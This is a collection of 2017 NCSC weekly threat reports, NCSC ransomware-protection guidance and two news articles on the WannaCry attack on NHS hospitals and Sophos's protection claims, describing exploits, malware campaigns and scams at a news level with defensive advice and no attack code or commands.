Comment

NCSC - WEEKLY THREAT REPORT 21ST JULY 2017

New SMB protocol exploit effective against most windows operating systems

An EternalSynergy based exploit has now been developed which can compromise newer (unpatched) versions of Windows. The original ETERNALSYNERGY exploit released by The Shadow Brokers in April exploited an SMB protocol vulnerability, CVE-2017-0143, to allow attackers to inject code onto Windows machines but only worked on versions up to Windows 8.

A security researcher has now modified and upgraded ETERNALSYNERGY to be able to compromise all supported but unpatched Windows operating systems except for Windows 10. This new exploit code is publicly available to download on GitHub and ExploitDB.

This case shows that exploits previously thought to only be effective against older or unsupported operating systems such as Windows XP can be modified to compromise newer and currently supported systems. This illustrates the importance of rigorous vulnerability management and patching, including patching newer operating systems.

Rise in cyber crime as a service

A new credential-stealing malware, named Ovidiy Stealer, is being sold on cyber crime forums for as little as £6. The low price reflects its limited capabilities. It is non-persistent, so can be removed by simply rebooting an infected computer, but it is reportedly easy to use and capable of harvesting usernames and passwords for a number of common applications. Ovidiy Stealer has compromised targets around the world, including in the UK.

Similarly, a new Phishing-as-a-Service platform, 'HackShit', has been marketing itself to would-be fraudsters. For a monthly subscription, users can generate plausible looking login pages which imitate popular social media and dating sites. The subscribers can also use the platform to trade compromised accounts for cryptocurrency, and to view tutorials on hacking and phishing.

The increasingly low barriers to entry for cyber crime are of concern because individuals with limited technical knowledge can now purchase basic cyber capabilities for a modest sum.

 

Comment

.author-name { display: none; }

Comment

NCSC - Weekly Threat Report 14th July 2017

China to ban personal VPNs

The Chinese government has told state-owned telecoms companies to block individuals’ access to virtual private networks (VPNs) by 1 February 2018, according to media reports. The ban will greatly restrict individuals’ unfettered access to the Internet. VPNs have often been used to circumvent China’s Great Firewall and communicate securely with servers outside of China. The Chinese government has increasingly cracked down on them in pursuit of “Internet sovereignty”, or controlling online activity within China’s borders.

The ban on individual access to VPNs follows new rules introduced in June 2017 requiring companies wishing to use VPNs to apply to the government for permission. They also face strict rules on data transfers. Many foreign businesses have expressed concern at the implications for privacy, data protection and the security of their intellectual property. Possible workarounds may exist for technically proficient individuals, but average Internet users face being cut off from the free and open Internet.

Sources: Bloomberg News, “China Tells Carriers to Block Access to Personal VPNs by February” (10 July 2017); Washington Post, “Here’s China’s latest plan to keep its citizens from the open Internet” (10 July 2017)
 

Communications take quantum leap forward in China?

China’s ongoing project to develop an ‘unhackable’ quantum communications (QC) network, where communications cannot be intercepted without being detected, continues to move forward. The country is developing the world’s longest land-based QC network stretching 2,000 km between Beijing and Shanghai. It is being developed in the eastern city of Jinan, where a trial network of 200 terminals will enter service in August 2017. China intends to use it to enable ultra-secure communications for the government, military and commercial banks.

China has also reportedly demonstrated the first ground-to-orbit quantum teleportation (QT) using an experimental satellite. The test was conducted by “entangling” two photons, one on the ground and the other on the satellite, then using quantum physics to transmit information from one to the other at a distance of 500 km. While QT has previously been conducted through fibre-optic cables, a successful trial in space offers the prospect of ultra-secure wireless data communications. China’s claim has yet to be verified by other scientists.

Comment

.author-name { display: none; }

Comment

NCSC - Weekly threat report 7th July 2017

Scams follow widely reported attempt to compromise parliamentary email accounts

Following reported attempts by hackers to compromise parliamentary email accounts in June, scammers have recently attempted to gain information by cold-calling (or vishing) MPs and their staff. Posing as staff from the Houses of Parliament’s IT department, the scammers have reportedly been requesting the usernames and passwords of MPs. Vishing, like its online equivalent, phishing, attempts to illicit sensitive information, such as passwords, or encourage victims to visit particular (invariably malicious) websites.

Scammers try to capitalise on heightened public awareness of particular issues. Such social engineering techniques often increase in prevalence follow a high-profile incident. For example, following the WannaCry ransomware incident, there were several reported scams, including fake fixes for the malware, and malicious ‘tech support’ services. Phone calls can form part of a blended social engineering campaign, along with emails or social media contact. It is likely that scams such as these will continue to follow widely reported events. 

Comment

.author-name { display: none; }

Comment

NCSC - Weekly Threat Report 30th June 2017

Password challenges

Passwords have been in the news again recently. Most notably, on Friday 23 June accounts with weak passwords on the UK Parliamentary network were compromised; however less than 1% of the system’s 9,000 accounts were directly affected. Attention was also drawn this week to router password vulnerabilities, as Virgin Media advised customers with Virgin Super Hub 2 home routers to reset their passwords. This followed concerns that the routers had a relatively weak eight-character default password consisting of lower case letters that could be cracked in four days, potentially allowing access to other home devices. Routers supplied by other service providers may also come with default passwords. 

Passwords also featured in Ciaran Martin’s interview with BBC’s Today programme (Friday 30 June, 0810) where he recommended that two-factor authentication be used so that a stolen password is much less valuable to a criminal.


A portion of Microsoft Windows 10 Source code leaked online

Microsoft have confirmed a portion of its source code has been leaked online. The initial source of the leak is unknown; however, the content was posted to Beta Archive, one of the largest online ‘Beta and Abandonware’ repositories for prototype software. The leaked content was 1.2GB in size and has since been removed from the Beta Archive site. 

Microsoft already shares some of its source code with industry partners and government through its Shared Source Initiative. However, this instance represents an unauthorised leak. A number of theories about who is responsible are currently circulating. Was it one of Microsoft’s trusted partners who already had access to the source code? Or was it a criminal who illegitimately obtained access to the code before leaking it? There is no evidence to confirm either way at this stage. The leak occurred one day after two men were arrested in the UK for unauthorised access to Microsoft’s network, however there is no evidence that these two incidents are related. 

Some reports have highlighted the risks of malicious actors using the leak to identify vulnerabilities in the code before developing exploits to target them.  However, when a similar leak occurred in 2004 of Microsoft’s Windows 2000 code, similar claims were made, but did not result in a significant up-tick in related attacks. Also, white hat hackers may use the leaked code as an opportunity to investigate it for vulnerabilities before reporting them to Microsoft for fixing.

While Microsoft has responded to this incident, questions have been raised about how the source code was originally obtained.


Disgruntled ex-employee conducts Smart Meter Network attack

A former radio frequency engineer used information about systems he had worked on to disable meter reading equipment at several US water utility companies. The individual has since been convicted of two counts of "unauthorized access to a protected computer and thereby recklessly causing damage” and has been sentenced to 12 months in prison.

This case demonstrates the importance of removing software accesses when dismissing staff and appropriate access management. The software used by the former employee remained on his home computer following termination, he also retained access to default root passwords. Using this he took advantage of his pre-existing network and systems accesses to cause disruption (including changing the password to an obscenity and the code for a computer script to the lyrics of a Pink Floyd song) reportedly out of frustration more than a malicious, destructive intent. 

Critically this was not a sophisticated cyber attack; the perpetrator knew enough about the system to effectively disrupt it with limited cyber capabilities. Appropriate access management is important not only for employees leaving organisations, but also those moving into different departments where their access requirements may change. Lax access management often enables insiders to have greater, more targeted impact against their organisations.


Cyber crime trends and statistics in 2016

The FBI have recently published their annual internet crime report.  The trending topics for 2016 were Business Email Compromise (BEC), ransomware, technical support fraud and extortion.

A total of 298,728 complaints were received, with reported losses in excess of $1.3 billion.  The FBI estimate that only 15 percent of fraud victims in the US report their crimes to law enforcement.

The UK's National Crime Agency (NCA) considers underreporting a huge barrier to understanding the true scale and cost of cyber crime. The reasons for underreporting include reputational damage; not knowing who to report the crime to; what constitutes a cyber crime; and being unaware that a crime has taken place.

Although figures in the FBI report are not directly comparable with UK statistics, they do indicate similarities in overall trends such as the increase in ransomware crimes, BEC compromise and technical support fraud.

NCA has recently published a report highlighting these cyber crime trends as well as an increase in the prevalence of mobile malware. NCA has also highlighted the Internet of Things (IoT) threat as having become more mature in 2016.

The UK has also seen an increase in technical support fraud, and British law enforcement and Microsoft have been working together for two years investigating these scams.  Criminals will typically trick victims into believing their computers have been infected with malware and then persuade the victim to pay for the problem to be fixed. Sometimes the scam involves a pop-up message appearing on a computer claiming to be "Microsoft Technical Support".  As a result of the investigation, four UK citizens have recently been arrested.

The NCSC has guidance for businesses in understanding the cybercrime model and for members on the public how to protect against cyber crime and what to do if you think you have been the victim of a cyber crime.


Ransomware tool causes widespread disruption

On Tuesday 27 June, widespread disruption was caused in Ukraine by a ransomware tool that spread to other organisations worldwide via trusted networks. The ransomware tool, with similarities to the Petya ransomware that first struck in early 2016, was inserted into a compulsory software update for Ukrainian financial and government institutions.

Once the malware was installed it looked for other systems to exploit using some of the same worm-like capabilities seen in the WannaCry attacks. In addition, infected devices were subjected to a memory and file system scrape to steal credentials which allowed the malware to move laterally through a network even if it was patched against the exploits used. This highly crafted tool was designed to spread rapidly, in some cases overriding the Master Boot Record (MBR) on infected computers and displaying a ransom note asking for payment in Bitcoins. Despite the request for bitcoins it should be noted that the malware does not store a decryption key and as such attackers could not restore a victim’s files following payment; there have been no reported successful decryptions following payment.

The NCSC announced on Thursday 29 June that while managing the impact to the UK, its experts had found evidence that questioned initial judgements that the intention of this malware was to collect a ransom. The NCSC is investigating with the NCA and industry whether the intent was to disrupt rather than for any financial gain.

The malware has spread to a number of organisations worldwide that do business with Ukraine, including Russia’s oil firm Rosneft, Danish shipping concern Maersk and a large UK advertising agency.

Whilst this latest ransomware infection is more limited in scale than the WannaCry, it is assessed that the success of these two incidents are likely to motivate other actors who aim to cause widespread disruption to employ “ransomware” to do so.

Comment

.author-name { display: none; }

Comment

NCSC - Weekly Threat Report 23rd June 2017

This report is drawn from recent open source reporting.

Fake airline websites distributed by social media

Scammers are using the brands of major global airlines to lure users to fake websites and then encourage them to share links to the sites with friends. When a user clicks through to the sites they are prompted to answer a few simple questions and provide personal information to get free flights. Once they give away their name, email, phone, date of birth and address they are then told they will receive the flights, only once they ‘like’ and share the page on Facebook, spreading the fake sites to new victims.

According to threat researchers, cyber criminals were observed registering 95 fake websites in late March using the brands of 19 major airlines, including ones based in the UK.  The personal details provided by the victims are used for fraudulent marketing purposes, namely to drive traffic to websites that provide online promotions and monetisation of web and mobile applications. Fraudsters, like marketing managers, often leverage an effective freebie strategy (gifts, prize draws etc.) to attract public attention.

In the run up to the summer holidays, this cyber-enabled fraud may lead to lost custom and reputational damage for the airlines. The use of social media to distribute fake websites is likely to continue to increase. It is not limited to airlines and could affect any well-known brand.  There also remains a risk that malicious actors could modify the scheme and use such sites to distribute malware to victims. For guidance see the NCSC’s 10 Steps: Malware Prevention.

Comment

.author-name { display: none; }

Comment

NCSC - Weekly Threat Report 16th June 2017

 

Mouseover malware masquerading in Powerpoint files

According to media reports, a new method of delivering malware has surfaced. 'Zusy' malware, according to IT company ExtremeTech, is a banking trojan whose intention is to steal credentials. The reports suggest that simply hovering your mouse over a link will lead to infection without requiring you to click on anything. However, several stages are required to successfully infect a user.

What is interesting about this malware is that the initial infection vector does not rely on Macros or JavaScript to execute its malicious code. Instead, the malware developer has focused on abusing certain features in Microsoft PowerPoint to download and deploy the banking trojan.

This malware is initially delivered to users through phishing as an email attachment. Firstly the user needs to click on and open an attachment which displays a PowerPoint slide in slide show mode. A segment of text or a picture on the PowerPoint slide will have a clickable hyperlink. The most common message seen at this time is 'Loading...Please wait'. The 'mouseover' malware will only initiate if the user directs their cursor over the text or picture. A command is then executed which attempts to run an external program such as a PowerShell script. At this point Microsoft's security feature, Protected View, which is enabled by default, will display a warning notice allowing the user to disable the program. If the program is not disabled, it will create a backdoor giving the attacker full access to the victim machine. Users running PowerPoint versions older than 2010 are particularly vulnerable to this type of attack because when they hover over the link the preview window will open automatically without giving them the option to disable the malicious program.

Historically malware infections occur when the victim clicks on a suspicious link and general guidance has always advised users to hover over links to check file formats for suspicious executables. Users should continue to remain aware and be vigilant when receiving email attachments.

Although this development is not as alarming as it may first appear, the NCSC assesses that we may see a more sophisticated version of this attack vector in the future. The NCSC recommends that users follow NCSC malware guidance which includes regularly updating antivirus software to reduce the risk of being infected.

Enterprises that implement Application whitelisting approaches as described in the NCSC Windows EUD Security Guidance will also mitigate current variants of this threat by preventing the malicious scripts and programs downloaded by the malware from running.

 

Industrial Control Systems malware (Industroyer/CrashOverride)

The NCSC is aware of open source reporting providing details of malware dubbed as 'Industroyer' or 'CrashOverride', which is reported to be connected with the December 2016 power outages in Ukraine.

Previous media reporting suggests that during this incident, cyber attackers compromised parts of the Ukrainian electricity transmission network, resulting in the loss of electricity supply to customers for approximately one hour.

The NCSC have published on CiSP details of mitigation strategies to secure networks against these attacks. US-CERT have also published analysis and indicators of compromise.

Comment

.author-name { display: none; }

Comment

NCSC - Weekly Threat Report 9th June 2017

Fireball malware

More than 250 million computers worldwide have been infected with malicious adware called Fireball, according to recent reporting.  Produced by Rafotec, a Beijing-based digital marketing firm, the malware is spread mostly via bundling. That is, when a user downloads a product they want, the Fireball malware is ‘bundled’ in without the user’s knowledge or consent.

Once infected, Fireball hijacks the user’s browser, installs extra plug-ins and manipulates the user’s web traffic. By redirecting traffic to Rafotec’s fake search engines, Fireball is able to generate additional advertising revenue for the company. A greater concern is the fact that Fireball can, in theory, be repurposed to serve as a fully functioning malware downloader.

Should Fireball be repurposed for further malicious activity it could be used to harvest sensitive data, such as financial credentials, medical records, or corporate business plans for example. Whilst estimates are that Indonesia, India and Brazil have the highest infection rates at present, other countries have been impacted.

In line with NCSC guidance, make sure you only install software from trusted sources.

Single Sign On provider OneLogin is compromised

In late May, OneLogin, an online access and identity manager, experienced a security breach where sensitive customer data in its US region may have been compromised.  OneLogin primarily provides Single Sign On (SSO) and identity management services for corporate customers using cloud based applications.  It is not yet clear how the unauthorised access happened nor the impact, but it is suspected that a threat actor obtained access to Amazon Web Store (AWS) keys and used them to gain access to the AWS Application Programme Interface (API) via another smaller provider in the US.  The actor was then able to access database tables containing information about users, apps and various types of keys.  This may have included the ability to decrypt encrypted customer data.

To minimise damage OneLogin issued advice to customers which included generating new keys, authorisation tokens, security certificates and credentials and updating passwords.

This is not the first time an SSO or similar service has been targeted.  Although, like password managers, they are increasingly considered to be a better way of managing accesses, they are a tempting target for attackers, and the consequences of compromise can be severe.

A new variant of Qakbot malware is bringing down enterprise networks

A new variant of the Qakbot (aka Qbot or PinkSlip) trojan, first seen in 2009, is stealing user information and installing backdoors on Microsoft Windows operating systems. Qakbot malware is used to target online bank accounts of businesses and individuals. Victims are initially infected through an exploit kit, phishing campaign or malicious download.

This new variant has worm-like, self-replicating capabilities similar to WannaCry but it is not ransomware and does not encrypt user hard drives. In its attempts to steal or brute force login details it can cause mass Active Directory lockouts. Some organisations have had thousands of users prevented from using corporate systems as a result.

According to researchers, Qakbot code has been totally re-written and is even more advanced and effective. The new features make it difficult to detect by using obfuscating code and constantly evolving file structure and signatures.

We assess it likely that other malware campaigns will make use of these antivirus avoiding techniques. Users should stay on their guard against suspicious emails and activity and keep their systems up-to-date to help prevent infection.

Vulnerabilities

This week’s summary starts with Google and multiple flaws fixed in both Chrome and Android leading to URL spoofing, obtaining of sensitive information and remote code execution.

Cisco released updates for a number of different products; TelePresence, AnyConnect, Email Security Appliance, Prime Data Center Network Manager, NX-OS, Content Security ManagementAppliance, and 8800 Series IP phones, to address cross-site scripting, bugs that cause the target to crash, allow unauthorised access or remote code execution.

IBM released updates for their Security Access Manager Appliance, Spectrum Project (IBM Tivoli Storage Manager) and Domino TLS Server to prevent elevation of privilege, the viewing passwords, obtaining of sensitive information, and obtaining of authentication credentials.

Elsewhere this week there were updates for Wireshark, Apache Tomcat, VMware vSphere and Irssi.

Debian specific updates this week came from perl, nss and zookeeper.

ICS specific updates for Digital Canal Structural Wind Analysis and Rockwell Automation PanelView.

Comment

.author-name { display: none; }

Comment

NCSC - Weekly Threat Report 2nd June 2017

Android app malware

According to IT security company Check Point, as many as 36 million Android devices may have been infected with ad-click malware. The malware, dubbed Judy, is reported to have been present in approximately 50 apps in Google’s play store, but the total number of infections cannot be accurately determined as it is not known for how long the apps have been malicious.

Those responsible generate money through ad-clicks – in this instance Judy silently imitated a browser and clicked on banners from Google’s ad infrastructure to generate revenue for the malware author. The malware has had little real impact upon the end user, though it does equate to an illegitimate use of a device, and could potentially be exploited for more sophisticated attacks, including: gaining control of devices for additional malware download, conducting DDoS attacks or gaining access to private networks.

Google’s protection system did not immediately identify the problem because the apps themselves did not contain any malicious code. Rather, once downloaded from the play store, the affected apps are designed to call out to a remote server which then delivers malicious ad-click software to devices.

This type of two-stage delivery is increasingly common. Last month, FalseGuide malware was discovered hidden inside apps and games on the play store. Following download, these compromised apps allow malicious actors to install additional malicious software. App stores may come under increased pressure to enhance their scrutiny of apps before permitting them to feature, particularly if the number of instances of adware infections increases.

The NCSC recommends that users only install apps from the official application store for your device. Malicious apps in official stores are more likely to be discovered, and subsequently removed from the store and the device.
 

RoughTed Malvertising Campaign

Threat researchers at internet security firm Malwarebytes have recently highlighted a significant malvertising campaign, called RoughTed, which has been running for over a year.

Malvertising (or ‘malicious advertising’) uses online advertising as a delivery method for malware. Malware-infected ads can be inserted into popular, legitimate websites, and often do not require user action to be effective: simply visiting an infected site can be enough to get infected.

Criminal use of malvertising as a vector for malware delivery has been an increasing trend since it was first observed in approximately 2007 with the exploitation of a vulnerability in Adobe Flash. In 2015 Google disabled more than 780 million ads that violated their policies, some of which carried malware, up from 524 million in 2014.

RoughTed is notable for its prolific distribution, with associated domains accumulating in excess of half a billion visits in a three month period. According to researchers, traffic diverted to RoughTed-related domains comes from thousands of different websites, some of which ranked in the electronic personal assistant, Alexa’s, top 500 websites. RoughTed can reportedly target a wide array of users according to their operating system, browser and geolocation before delivering a variety of payloads, including exploit kits and malware. Moreover, RoughTed has been circumventing adblockers, broadening the pool of potential victims.

Comment

.author-name { display: none; }

Comment

NCSC - Weekly Threat Report 26th May 2017

This report is drawn from recent open source reporting.

Russian government reaction to cyber criminals

This week Russia revealed it had arrested a cyber crime gang in November last year for a campaign that raised nearly USD900, 000. The gang was nicknamed ‘Cron’ after the malware it used, which infected over a million Android mobile devices of Russian bank customers. Users unwittingly downloaded the malware via fake mobile banking apps, pornography and e-commerce programmes. The ‘Cron’ gang exploited a Russian bank service which allows users to move small amounts of money to other accounts by sending an SMS message. The criminals sent SMS messages from infected devices instructing banks to transfer funds to their own accounts. According to Group-IB, the Russian cyber security company that worked with Russian law enforcement on the investigation, the ‘Cron’ gang were planning to rent a further piece of malware adapted to target banks in France, Germany, the UK and the US amongst other unnamed countries.

Fake applications that impersonate a brand or organisation are not new. Purchasing from legitimate sources can reduce the risk of acquiring bogus applications.


Fake malware fixes

WannaCry ransomware may not have generated the wealth the scammers responsible were hoping for but since the attack enterprising criminals have been attempting to cash in on the heightened public awareness of WannaCry. Targeting concerned users, scammers have been offering a range of fake ‘fixes’ and ‘support services’.

This type of social engineering is a common methodology for cybercriminals. Whether viral social media posts, malicious pop-ups or well-crafted phishing campaigns, high profile events such as the WannaCry attack offer cyber criminals a hook to spread malware or to solicit funds.

It’s not only online incidents that criminals seek to take advantage of. Following news of high profile disasters such as hurricane Catrina in 2005, the 2014 Ebola outbreak and the 2015 Nepal earthquake, scammers set up fake charity websites and sent phishing emails in attempts to steal funds donated to the victims.

Recent examples of scams piggybacking on the WannaCry incident include:

  • Alerts circulating of social media directing users to fake WannaCry patches which deliver malware;
  • A phishing email posing as a BT customer service email which informs the user they are locked out of their BT account and directs them to a malicious link to obtain a ‘security upgrade’ to re-establish full access;
  • Third party app stores offering ‘patches’ for mobile users - despite the fact no mobile operating systems are believed to be vulnerable to WannaCry.

The recent UK Action Fraud alert has more information on specific fraud attempts.

The NCSC guidance page has further information on how to protect against phishing attempts as well as our recent blog on social engineering.


Europol arrest 27 individuals involved in black box ATM attacks

An international law enforcement effort has resulted in the arrest of 27 individuals in connection with a string of successful black box attacks against ATMs across Europe. These attacks are thought to have generated up to EUR 0.5 million for the criminals responsible. Black Box attacks are cyber-enabled and involve physically penetrating an ATM’s casing to obtain access to exposed cables and ports. A laptop can then be connected and used to issue instructions to an ATM to cash out its bank notes. These attacks are less sophisticated and more common than cyber-dependant attacks that deploy malware to ATMs remotely, over a financial institution’s network. For more information on the cyber threat to UK ATMS, please see our recent assessment on CiSP.

Comment

.author-name { display: none; }

Comment

NCSC - Weekly Threat Report 19th May 2017

WannaCry ransomware attack illustrates risk of using unlicensed software

The WannaCry international ransomware attack has highlighted the risks of relying on unpatched software. The scale of the outbreak has been blamed in part on the widespread use of unlicensed software. Pirated software is often insecure as it does not benefit from manufacturers’ updates to fix vulnerabilities.

Several of the countries reported by cyber security companies to be worst affected are also amongst the countries where unlicensed software is most widely used.

This incident illustrates that while using unlicensed software might be seen as a way of saving money in the short term, it can put cyber security at serious risk and may potentially lead to losses far outweighing any savings.

The NCSC's guidance on protecting your organisation from ransomware can be found here. Further guidance for home users and small businesses as well as enterprise administrators is also available.

Comment

.author-name { display: none; }

Comment

NCSC Guidance - Protecting your organisation from ransomware

Protecting your organisation from ransomware

Created:  17 Oct 2016

Updated:  17 Oct 2016

How to prevent a ransomware incident, and what to do if your organisation is infected.

Ransomware is a growing global cyber security threat, and one which could affect any organisation that does not have appropriate defences. The first half of 2016 saw an almost threefold increase in ransomware variants compared to the whole of 2015[1].  While ransomware against Windows operating systems has been commonplace for some years, attacks against Mac and Linux systems are also seen.

The methods for infecting systems with ransomware are similar to other types of malicious software, as are the steps organisations can take to protect themselves. Depending on your level of preparation, ransomware infection can cause minor irritation or wide-scale disruption.

This guidance provides an overview of ransomware, suggests some simple steps to prevent a ransomware incident, and advises on what to do if your organisation is infected by ransomware.

What is ransomware?

There are two types of ransomware; the first type encrypts the files on a computer or network. The second type locks a user's screen. Both types require users to make a payment (the 'ransom') to be able to use the computer normally again. The ransom is often demanded in a cryptocurrency such as Bitcoin.

In many cases, the ransom amount is quite modest. This is designed to make paying the ransom the quickest and cheapest way to return to normal use. However, there is no guarantee that the key or password (to 'unlock' the computer) will be provided upon payment of the ransom.

The scale and automated nature of a ransomware attack makes it profitable through economies of scale, rather than through extorting large amounts from targeted victims. In some cases, ransomware has been known to strike the same victim more than once in succession. Ransomware attacks are not normally targeted at specific individuals or systems, so infections can occur in any sector or organisation.

How does ransomware infect your system?

Computers are infected with ransomware via a number of routes. Sometimes users are tricked into running legitimate-looking programs, which contain the ransomware. These may arrive via authentic-looking email attachments or links to apparently genuine websites (otherwise known as phishing). More recently, we have seen ransomware infections which rely on unpatched vulnerabilities in computers, and simply visiting a malicious website can be enough to cause a problem.

Although less common, data transfers between computers (such as via USB memory sticks) can also cause ransomware to spread.

Preventing ransomware using good enterprise security

Ransomware is one of many types of malware, and the methods for its delivery are common to most other types. You can minimise the risk of being infected by ransomware by taking the same precautions necessary to guard against malware in general.

The following mitigations are examples of good security practice, and link to other NCSC guidance where available:

  • Vulnerability management and patching - some ransomware gains control by exploiting software vulnerabilities in operating systems, web browsers, browser plug-ins or applications. Often these vulnerabilities have been publicly known about for some time and the software providers will have made patches available to mitigate them. Deploying these patches, or otherwise mitigating the vulnerabilities, is the most effective way of preventing systems being compromised. However, as well as patching the devices used for web browsing and email, it's important to patch the systems they are connected to, since some ransomware is known to move around systems, encrypting files as it goes.
  • Controlling code execution - consider preventing unauthorised code delivered to end user devices from running.  One common way that attackers gain code execution on target devices is to trick users into running macros. You can prevent these attacks from being successful in your organisation by preventing all macros from executing - unless you have explicitly trusted them. It's also good practice to ensure users do not have privileges to install software on their devices without the authorisation of an administrator. Remember that users may sometimes legitimately need to run code that you have not pre-authorised; consider how you will enable them to do this, so that they are not tempted to do it secretly, in ways you can't see or risk-manage. See our End User Device security guidance for recommended configuration of the platforms you are running.
  • Filter web browsing traffic - we recommend using a security appliance or service to proxy your outgoing web browsing traffic. Filter attempted connections based on categorisation or reputation of the sites which your users are attempting to visit.
  • Control removable media access - see our advice on management of removable media to prevent ransomware from being brought in to an organisation via this channel.

For more information see Approaching enterprise technology with cyber security in mind.

What impact does ransomware have?

Ransomware will prevent access to systems or data until a solution is found. If systems are delivering critical services, this can have serious reputational, financial and safety impacts on affected organisations and their customers. Even if the victim has a recent backup of their system, it may still take considerable time to restore normal operations. During this time, organisations may have to invoke their Business Continuity processes.

It is worth noting that if a criminal organisation has carried out a successful ransomware attack, questions should be raised about the possibility of more indirect and lasting impacts. For example, how many instances of the ransomware are still present in the system waiting to be activated? How should they be removed, and how should users be warned? Were other types of malware also deployed at the same time? What are they and what will they do? And when?

Limiting the impact of a ransomware attack

The following measures can all help to limit the impact of a ransomware attack.

  • Good access control is important. The compartmentalisation of user privileges can limit the extent of the encryption to just the data owned by the affected user.  Re-evaluate permissions on shared network drives regularly to prevent the spreading of ransomware to mapped and unmapped drives. System administrators with high levels of access should avoid using their admin accounts for email and web browsing.
  • Ransomware doesn’t have to go viral in your organisation; limit access to your data and file systems to those with a business need to use them. This is good practice anyway and, like many of the recommendations we make here, prevents against a range of cyber attacks.
  • Have a backup of your data. Organisations should ensure that they have fully tested backup solutions in place. Backup files should not be accessible by machines which are at risk of ingesting ransomware. It is important to remember backups should not be the only protection you have against ransomware - the adoption of good security practices will mean not getting ransomware in the first place. For further guidance on backups, please see our Securing Bulk Data guidance, which discusses the importance of knowing what data is most important to you, and how to back it up reliably.

What to do if your organisation has been infected with ransomware

If you need to know more about ransomware and its effects, or you have a ransomware issue, there are a number of sources of further advice and guidance:

  • The National Crime Agency encourages anyone who thinks they may have been subject to online fraud to contact Action Fraud at www.actionfraud.police.uk.  It is a matter for the victim whether to pay the ransom, but the NCA encourages industry and the public not to pay.
  • The National Cyber Security Centre (NCSC) runs a commercial scheme called Cyber Incident Response, where certified companies provide crisis support to affected organisations.
  • The Cyber Security Information Sharing Partnership (CiSP) offers organisations in the UK a safe portal in which to discuss and share intelligence that can assist the community and raise the UK's cyber resilience. We encourage our members to share technical information and indicators of compromise so that the effects of new malware, and particularly ransomware, can be largely reduced. 

Here at the NCSC, we welcome those who would like to share their experiences of ransomware in confidence. NCSC Operations provide threat intelligence to government, industry and the public. Case studies - even anonymised - can be very helpful.

Comment

.author-name { display: none; }

Comment

UK hospital meltdown after ransomware worm uses NSA vuln to raid IT

UK hospital meltdown after ransomware worm uses NSA vuln to raid IT

Docs use pen and paper after computers scrambled amid global outbreak

Final update UK hospitals have effectively shut down and are turning away non-emergency patients after ransomware ransacked its networks.

Some 16 NHS organizations across Blighty – including several hospital trusts such as NHS Mid-Essex CCG and East and North Hertfordshire – have had their files scrambled by a variant of the WannaCrypt, aka WanaCrypt aka Wcry, nasty. Users are told to cough up $300 in Bitcoin to restore their documents.

Doctors have been reduced to using pen and paper, and closing A&E to non-critical patients, amid the tech blackout. Ambulances have been redirected to other hospitals, and operations canceled.

It is understood WannaCrypt, which is raiding companies and organizations across the planet today, is being spread by a worm that exploits unpatched vulnerabilities in Windows machines – particularly MS17-010, an SMB bug attacked by the leaked NSA tool, EternalBlue. The security hole has been patched for modern Windows versions, but not WindowsXP – and the NHS is a massive user of the legacy operating system.

A spokesperson for NHS Digital said: "We're aware that a number of trusts that have reported potential issues to the CareCERT team. We believe it to be ransomware."

East and North Hertfordshire NHS confirmed in a press statement: "Today, the trust has experienced a major IT problem, believed to be caused by a cyber attack. Immediately on discovery of the problem, the trust acted to protect its IT systems by shutting them down; it also meant that the trust's telephone system is not able to accept incoming calls.

"The trust is postponing all non-urgent activity for today and is asking people not to come to A&E – please ring NHS111 for urgent medical advice or 999 if it is a life-threatening emergency."

It said the trust's IT specialists were working to clean up the mess.

"I'm led believe that there is a major attack underway on the NHS with systems down nationwide," one reader told us. "My wife is a GP and their systems were just shut down and they were told it was because of a 'National hack of the computer health care system'."

Updated to add

Payments appear to be being made to the Bitcoin addresses given in the NHS ransomware attack – which in turn confirms that the same strain of malware has infected Telefónica Spain, Gareth Corfield reports.

This same address is seen on computer screens in Spain and other countries hit by the WannaCrypt variant. A payment of 0.15 Bitcoin – worth roughly $266 dollars at the time of writing – was made to that address two hours ago, as the Blockchain tracker shows. It is not possible to say who paid this amount. The NHS attackers are asking for $300 worth of Bitcoin in ransom payments.

NHS Digital response

NHS Digital confirmed a number of organisations have reported they have suffered a ransomware attack which is affecting a number of different organisations.

It said: "The investigation is at an early stage but we believe the malware variant is Wanna Decryptor. At this stage we do not have any evidence that patient data has been accessed. We will continue to work with affected organisations to confirm this. NHS Digital is working closely with the National Cyber Security Centre, the Department of Health and NHS England to support affected organisations and to recommend appropriate mitigations. This attack was not specifically targeted at the NHS and is affecting organisations from across a range of sectors.

"Our focus is on supporting organisations to manage the incident swiftly and decisively, but we will continue to communicate with NHS colleagues and will share more information as it becomes available." ®

Comment

.author-name { display: none; }

Comment

Sophos waters down 'NHS is totally protected' by us boast

Watered down homeopathy for computers is more powerful, m'kay?

Updated Sophos updated its website over the weekend to water down claims that it was protecting the NHS from cyber-attacks following last week's catastrophic WannaCrypt outbreak.

Proud website boasts that the "NHS is totally protected with Sophos" became "Sophos understands the security needs of the NHS" after the weekend scrub-up.

Security-watchers, including former staffer Graham Cluley, noticed the reverse ferret.

Sophos didn't publish a definition update until 1825 BST, hours after an outbreak that forced hospitals to postpone scheduled treatments and appointments in scores of NHS Trusts. Sophos Live Protection functionality, if enabled, could detect WannaCrypt earlier than that.

Signature updates aren't the only layer of security in modern anti-malware but this only raises further questions about why Sophos's technology didn't pick up an attack based on a known exploit patched by Microsoft two months prior.

Sophos has been talking a lot about building better anti-ransomware defences over recent weeks, most particularly following the Invincea purchase back in February. Last month the company launched anti-ransomware CryptoGuard technology, a paid add-on to its Sophos Server Protection products.

El Reg asked Sophos to comment on what seemingly went wrong with its security defences but we're yet to hear back beyond an acknowledgement of our query.

Sophos's social media staff were tweeting about how its tech could protect against ransomware attacks on Thursday, a day before disaster struck.

It's all a bit awkward.

Sophos executives can, however, console themselves that the security firm's share price has risen markedly since the outbreak, rising 7.5 per cent in pre-lunchtime trading on Monday alone to reach 366.80 at the time of writing. ®

Updated at 15.05 UTC to add: Sophos has contacted us to say that customers using Sophos Intercept X or Exploit Prevention (EXP) "were protected proactively against the ransomware behaviour from the very first instance".

It added: "Sophos Endpoint Protection already detected some variants of the WannaCry ransomware. We added further detection at 15.58 UTC on Friday 12th May for samples in the new attack that we missed. This was a complex set of executables and exploits which took some time to analyse. We also thoroughly test all identity and rule updates before releasing them to our customers. The 17.25 UTC time in the KBA on our website is the time by which all our customers should have been updated. We are in the process of updating this wording in the KBA to be clearer.

"Sophos has added subsequent identities and generic detection rules to Sophos Endpoint Protection since then to block potential future variants of the malware and its techniques. We have also proactively contacted all our customers to advise them to deploy the Microsoft patch that mitigates the underlying vulnerability in the Microsoft OS."

Comment

.author-name { display: none; }

Comment

